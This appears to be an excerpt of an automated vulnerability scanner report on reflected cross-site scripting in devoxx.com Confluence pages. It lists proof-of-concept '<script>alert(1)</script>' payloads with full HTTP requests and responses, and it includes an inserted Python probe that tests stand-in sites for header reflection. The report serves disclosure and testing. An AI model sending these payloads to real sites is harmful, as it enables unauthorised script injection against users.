<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!-- userAgent: 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)' layout : 'Builder Layout: DEVOXX2010NSB' layoutId : 'DEVOXX2010NSB' spaceName : 'Devoxx 2010' currentURL : '/display/Devoxx2K10/Schedule+REST+interface?8b508--><script>alert(1)</script>c8a72497573=1' contextPath : '' action name : 'viewpage' ********* adaptavist.builder.sitemeshPage: com.opensymphony.module.sitemesh.parser.FastPage@16ef0c99 adaptavist.builder.helper: com.atlass ...[SNIP]...
1.19. http://devoxx.com/display/Devoxx2K10/Schedules [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://devoxx.com
Path: /display/Devoxx2K10/Schedules
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload df923--><script>alert(1)</script>b1370082457 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /display/Devoxx2K10/Schedules?df923--><script>alert(1)</script>b1370082457=1 HTTP/1.1
Host: devoxx.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=D5313254AFFC9A0CE82BE5FDA21303DD;
Response
HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 17:41:17 GMT
Cache-Control: no-cache, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-Confluence-Request-Time: 1289842877387
Content-Type: text/html;charset=UTF-8
Connection: close
Content-Length: 44902
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!-- userAgent: 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)' layout : 'Builder Layout: DEVOXX2010' layoutId : 'DEVOXX2010' spaceName : 'Devoxx 2010' currentURL : '/display/Devoxx2K10/Schedules?df923--><script>alert(1)</script>b1370082457=1' contextPath : '' action name : 'viewpage' ********* adaptavist.builder.sitemeshPage: com.opensymphony.module.sitemesh.parser.FastPage@14d4514a adaptavist.builder.helper: com.atlass ...[SNIP]...
1.20. http://devoxx.com/display/Devoxx2K10/Sidebar [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://devoxx.com
Path: /display/Devoxx2K10/Sidebar
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload aab21--><script>alert(1)</script>8f8e23b7fa2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /display/Devoxx2K10/Sidebar?aab21--><script>alert(1)</script>8f8e23b7fa2=1 HTTP/1.1
Host: devoxx.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=D5313254AFFC9A0CE82BE5FDA21303DD;
Response
HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 17:40:06 GMT
Cache-Control: no-cache, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-Confluence-Request-Time: 1289842806553
Content-Type: text/html;charset=UTF-8
Connection: close
Content-Length: 34277
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!-- userAgent: 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)' layout : 'Builder Layout: DEVOXX2010' layoutId : 'DEVOXX2010' spaceName : 'Devoxx 2010' currentURL : '/display/Devoxx2K10/Sidebar?aab21--><script>alert(1)</script>8f8e23b7fa2=1' contextPath : '' action name : 'viewpage' ********* adaptavist.builder.sitemeshPage: com.opensymphony.module.sitemesh.parser.FastPage@7978200a adaptavist.builder.helper: com.atlass ...[SNIP]...
1.21. http://devoxx.com/display/Devoxx2K10/Sponsors [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://devoxx.com
Path: /display/Devoxx2K10/Sponsors
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload e446f--><script>alert(1)</script>d63727a51fa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /display/Devoxx2K10/Sponsors?e446f--><script>alert(1)</script>d63727a51fa=1 HTTP/1.1
Host: devoxx.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=D5313254AFFC9A0CE82BE5FDA21303DD;
Response
HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 17:42:32 GMT
Cache-Control: no-cache, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-Confluence-Request-Time: 1289842952469
Content-Type: text/html;charset=UTF-8
Connection: close
Content-Length: 42427
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!-- userAgent: 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)' layout : 'Builder Layout: DEVOXX2010NSB' layoutId : 'DEVOXX2010NSB' spaceName : 'Devoxx 2010' currentURL : '/display/Devoxx2K10/Sponsors?e446f--><script>alert(1)</script>d63727a51fa=1' contextPath : '' action name : 'viewpage' ********* adaptavist.builder.sitemeshPage: com.opensymphony.module.sitemesh.parser.FastPage@1aa51ce1 adaptavist.builder.helper: com.atlass ...[SNIP]...
1.22. http://devoxx.com/display/Devoxx2K10/Twitter [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://devoxx.com
Path: /display/Devoxx2K10/Twitter
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 52c4c--><script>alert(1)</script>5fd2ec3b8e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /display/Devoxx2K10/Twitter?52c4c--><script>alert(1)</script>5fd2ec3b8e=1 HTTP/1.1
Host: devoxx.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=D5313254AFFC9A0CE82BE5FDA21303DD;
Response
HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 17:42:44 GMT
Cache-Control: no-cache, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-Confluence-Request-Time: 1289842964524
Content-Type: text/html;charset=UTF-8
Connection: close
Content-Length: 48598
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!-- userAgent: 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)' layout : 'Builder Layout: DEVOXX2010NSB' layoutId : 'DEVOXX2010NSB' spaceName : 'Devoxx 2010' currentURL : '/display/Devoxx2K10/Twitter?52c4c--><script>alert(1)</script>5fd2ec3b8e=1' contextPath : '' action name : 'viewpage' ********* adaptavist.builder.sitemeshPage: com.opensymphony.module.sitemesh.parser.FastPage@4d21dfd4 adaptavist.builder.helper: com.atlass ...[SNIP]...
The value of the User-Agent HTTP header is copied into an HTML comment. The payload a9adf--><script>alert(1)</script>e063112f8a0 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
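The two caveats in this entry, that the echoed value must survive a redirect and that the probe must be re-sent with the same header on the follow-up request, are easy to get wrong in a hand-written check. The following is an added example, not part of the report or of any Burp Suite code: a self-contained probe that sends a canary of the same shape as the report's payloads in a request header, follows same-host redirects while keeping the header, and reports whether the canary came back unmodified. Network access is replaced by two constructed stand-in sites (they are not devoxx.com): one reproduces the behaviour the report describes, including a hypothetical trailing-slash alias that redirects, the other HTML-encodes the header before echoing it.

```python
import html
import secrets
from dataclasses import dataclass
from typing import Callable
from urllib.parse import urlsplit


@dataclass
class Response:
    status: int
    headers: dict[str, str]
    body: str


# A "site" is anything that takes (path, request_headers) and returns a Response.
# In a real check this would be an HTTP client; here it is a local stand-in.
Site = Callable[[str, dict[str, str]], Response]

# Constructed page skeleton modelled on the debug comment shown in the report.
DEBUG_PAGE = ("<!DOCTYPE html>\n"
              "<!-- userAgent: '{ua}' currentURL : '{path}' -->\n"
              "<html><body>page</body></html>")


def vulnerable_site(path: str, headers: dict[str, str]) -> Response:
    """Stand-in with the report's behaviour: a hypothetical alias path ending in
    '/' redirects to the canonical page, which echoes User-Agent verbatim."""
    if path.endswith("/"):
        return Response(302, {"Location": path.rstrip("/")}, "")
    ua = headers.get("User-Agent", "")
    return Response(200, {"Content-Type": "text/html;charset=UTF-8"},
                    DEBUG_PAGE.format(ua=ua, path=path))


def hardened_site(path: str, headers: dict[str, str]) -> Response:
    """Same page, but the header value is HTML-encoded before it is written."""
    ua = html.escape(headers.get("User-Agent", ""))
    return Response(200, {"Content-Type": "text/html;charset=UTF-8"},
                    DEBUG_PAGE.format(ua=ua, path=path))


def make_canary() -> str:
    """Same shape as the report's payloads: hex prefix, comment closer plus
    script, hex suffix. The random ends make the match specific to this probe
    rather than to any '<script>' that may legitimately be on the page."""
    return (f"{secrets.token_hex(3)[:5]}--><script>alert(1)</script>"
            f"{secrets.token_hex(6)[:11]}")


def probe_header_reflection(site: Site, path: str, *, header: str = "User-Agent",
                            base_value: str = "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)",
                            max_redirects: int = 5) -> dict:
    """Send the canary in `header`, follow redirects, and report the outcome."""
    canary = make_canary()
    headers = {header: base_value + canary}
    chain = [path]
    resp = site(path, headers)
    # A browser re-sends the same User-Agent on every hop, so the probe must
    # too; a script that stops at the 30x, or drops the header when it follows
    # the Location, never sees the reflection and reports a false negative.
    while resp.status in (301, 302, 303, 307, 308) and len(chain) <= max_redirects:
        path = urlsplit(resp.headers["Location"]).path or "/"   # same-host redirect assumed
        chain.append(path)
        resp = site(path, headers)
    return {
        # "Unmodified" means every byte survived, including '-->' and '<script>';
        # an encoded echo ('--&gt;&lt;script&gt;') fails this test on purpose.
        "reflected_unmodified": canary in resp.body,
        "redirects_followed": len(chain) - 1,
        "final_path": path,
        "canary": canary,
    }


if __name__ == "__main__":
    for site, start in ((vulnerable_site, "/display/Devoxx2K10/Contact+Us/"),
                        (vulnerable_site, "/display/Devoxx2K10/Contact+Us"),
                        (hardened_site, "/display/Devoxx2K10/Contact+Us")):
        print(site.__name__, probe_header_reflection(site, start))
```

Even when the probe reports an unmodified reflection, the report's own caveat stands: the attacker still needs a way to make a victim's browser send a chosen User-Agent, so a finding in a request header is weaker than the parameter-name findings above it.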
The value of the User-Agent HTTP header is copied into an HTML comment. The payload cc315--><script>alert(1)</script>b009e1f4053 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
The value of the User-Agent HTTP header is copied into an HTML comment. The payload c556a--><script>alert(1)</script>8d773148ea2 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /display/Devoxx2K10/Contact+Us HTTP/1.1
Host: devoxx.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)c556a--><script>alert(1)</script>8d773148ea2
Connection: close
Cookie: JSESSIONID=D5313254AFFC9A0CE82BE5FDA21303DD;
Response
HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 17:43:04 GMT
Cache-Control: no-cache, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-Confluence-Request-Time: 1289842984417
Content-Type: text/html;charset=UTF-8
Connection: close
Content-Length: 35861
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!-- userAgent: 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)c556a--><script>alert(1)</script>8d773148ea2' layout : 'Builder Layout: DEVOXX2010' layoutId : 'DEVOXX2010' spaceName : 'Devoxx 2010' currentURL : '/display/Devoxx2K10/Contact+Us' contextPath : '' action name : 'viewpage' ** ...[SNIP]...
The value of the User-Agent HTTP header is copied into an HTML comment. The payload b82a0--><script>alert(1)</script>818a669cdc was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /display/Devoxx2K10/Devoxx+2008 HTTP/1.1
Host: devoxx.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)b82a0--><script>alert(1)</script>818a669cdc
Connection: close
Cookie: JSESSIONID=D5313254AFFC9A0CE82BE5FDA21303DD;
Response
HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 17:45:34 GMT
Cache-Control: no-cache, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-Confluence-Request-Time: 1289843134360
Content-Type: text/html;charset=UTF-8
Connection: close
Content-Length: 140842
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!-- userAgent: 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)b82a0--><script>alert(1)</script>818a669cdc' layout : 'Builder Layout: DEVOXX2010' layoutId : 'DEVOXX2010' spaceName : 'Devoxx 2010' currentURL : '/display/Devoxx2K10/Devoxx+2008' contextPath : '' action name : 'viewpage' * ...[SNIP]...
The value of the User-Agent HTTP header is copied into an HTML comment. The payload 739cc--><script>alert(1)</script>1003ca2f40e was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /display/Devoxx2K10/Devoxx+2009 HTTP/1.1
Host: devoxx.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)739cc--><script>alert(1)</script>1003ca2f40e
Connection: close
Cookie: JSESSIONID=D5313254AFFC9A0CE82BE5FDA21303DD;
Response
HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 17:47:07 GMT
Cache-Control: no-cache, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-Confluence-Request-Time: 1289843227872
Content-Type: text/html;charset=UTF-8
Connection: close
Content-Length: 174347
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!-- userAgent: 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)739cc--><script>alert(1)</script>1003ca2f40e' layout : 'Builder Layout: DEVOXX2010' layoutId : 'DEVOXX2010' spaceName : 'Devoxx 2010' currentURL : '/display/Devoxx2K10/Devoxx+2009' contextPath : '' action name : 'viewpage' * ...[SNIP]...
The value of the User-Agent HTTP header is copied into an HTML comment. The payload 9d682--><script>alert(1)</script>c9c2c6a7afd was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
The value of the User-Agent HTTP header is copied into an HTML comment. The payload 76fce--><script>alert(1)</script>67136241c2d was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /display/Devoxx2K10/Javaholics HTTP/1.1
Host: devoxx.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)76fce--><script>alert(1)</script>67136241c2d
Connection: close
Cookie: JSESSIONID=D5313254AFFC9A0CE82BE5FDA21303DD;
Response
HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 17:41:10 GMT
Cache-Control: no-cache, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-Confluence-Request-Time: 1289842870583
Content-Type: text/html;charset=UTF-8
Connection: close
Content-Length: 131050
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!-- userAgent: 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)76fce--><script>alert(1)</script>67136241c2d' layout : 'Builder Layout: DEVOXX2010NSB' layoutId : 'DEVOXX2010NSB' spaceName : 'Devoxx 2010' currentURL : '/display/Devoxx2K10/Javaholics' contextPath : '' action name : 'viewpage'
The value of the User-Agent HTTP header is copied into an HTML comment. The payload 2f7bb--><script>alert(1)</script>62282269653 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /display/Devoxx2K10/Jboss HTTP/1.1
Host: devoxx.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)2f7bb--><script>alert(1)</script>62282269653
Connection: close
Cookie: JSESSIONID=D5313254AFFC9A0CE82BE5FDA21303DD;
Response
HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 17:42:34 GMT
Cache-Control: no-cache, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-Confluence-Request-Time: 1289842954866
Content-Type: text/html;charset=UTF-8
Connection: close
Content-Length: 35546
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!-- userAgent: 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)2f7bb--><script>alert(1)</script>62282269653' layout : 'Builder Layout: DEVOXX2010NSB' layoutId : 'DEVOXX2010NSB' spaceName : 'Devoxx 2010' currentURL : '/display/Devoxx2K10/Jboss' contextPath : '' action name : 'viewpage' * ...[SNIP]...
The value of the User-Agent HTTP header is copied into an HTML comment. The payload aa6a7--><script>alert(1)</script>26499719511 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /display/Devoxx2K10/News HTTP/1.1
Host: devoxx.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)aa6a7--><script>alert(1)</script>26499719511
Connection: close
Cookie: JSESSIONID=D5313254AFFC9A0CE82BE5FDA21303DD;
Response
HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 17:40:36 GMT
Cache-Control: no-cache, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-Confluence-Request-Time: 1289842836428
Content-Type: text/html;charset=UTF-8
Connection: close
Content-Length: 38185
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!-- userAgent: 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)aa6a7--><script>alert(1)</script>26499719511' layout : 'Builder Layout: DEVOXX2010' layoutId : 'DEVOXX2010' spaceName : 'Devoxx 2010' currentURL : '/display/Devoxx2K10/News' contextPath : '' action name : 'viewpage' ******** ...[SNIP]...
The value of the User-Agent HTTP header is copied into an HTML comment. The payload f1c8f--><script>alert(1)</script>0d12e21b9d3 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /display/Devoxx2K10/Newsletter HTTP/1.1
Host: devoxx.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)f1c8f--><script>alert(1)</script>0d12e21b9d3
Connection: close
Cookie: JSESSIONID=D5313254AFFC9A0CE82BE5FDA21303DD;
Response
HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 17:42:52 GMT
Cache-Control: no-cache, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-Confluence-Request-Time: 1289842972291
Content-Type: text/html;charset=UTF-8
Connection: close
Content-Length: 37931
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!-- userAgent: 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)f1c8f--><script>alert(1)</script>0d12e21b9d3' layout : 'Builder Layout: DEVOXX2010' layoutId : 'DEVOXX2010' spaceName : 'Devoxx 2010' currentURL : '/display/Devoxx2K10/Newsletter' contextPath : '' action name : 'viewpage' ** ...[SNIP]...
The value of the User-Agent HTTP header is copied into an HTML comment. The payload 4db34--><script>alert(1)</script>867d6e034d4 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /display/Devoxx2K10/Oracle HTTP/1.1
Host: devoxx.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)4db34--><script>alert(1)</script>867d6e034d4
Connection: close
Cookie: JSESSIONID=D5313254AFFC9A0CE82BE5FDA21303DD;
Response
HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 17:42:44 GMT
Cache-Control: no-cache, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-Confluence-Request-Time: 1289842964740
Content-Type: text/html;charset=UTF-8
Connection: close
Content-Length: 35037
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!-- userAgent: 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)4db34--><script>alert(1)</script>867d6e034d4' layout : 'Builder Layout: DEVOXX2010NSB' layoutId : 'DEVOXX2010NSB' spaceName : 'Devoxx 2010' currentURL : '/display/Devoxx2K10/Oracle' contextPath : '' action name : 'viewpage'
The value of the User-Agent HTTP header is copied into an HTML comment. The payload cf8ba--><script>alert(1)</script>f98f0df6c51 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /display/Devoxx2K10/Partners HTTP/1.1
Host: devoxx.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)cf8ba--><script>alert(1)</script>f98f0df6c51
Connection: close
Cookie: JSESSIONID=D5313254AFFC9A0CE82BE5FDA21303DD;
Response
HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 17:40:25 GMT
Cache-Control: no-cache, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-Confluence-Request-Time: 1289842825985
Content-Type: text/html;charset=UTF-8
Connection: close
Content-Length: 34092
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!-- userAgent: 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)cf8ba--><script>alert(1)</script>f98f0df6c51' layout : 'Builder Layout: DEVOXX2010' layoutId : 'DEVOXX2010' spaceName : 'Devoxx 2010' currentURL : '/display/Devoxx2K10/Partners' contextPath : '' action name : 'viewpage' **** ...[SNIP]...
The value of the User-Agent HTTP header is copied into an HTML comment. The payload ff364--><script>alert(1)</script>7b5293c13a6 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
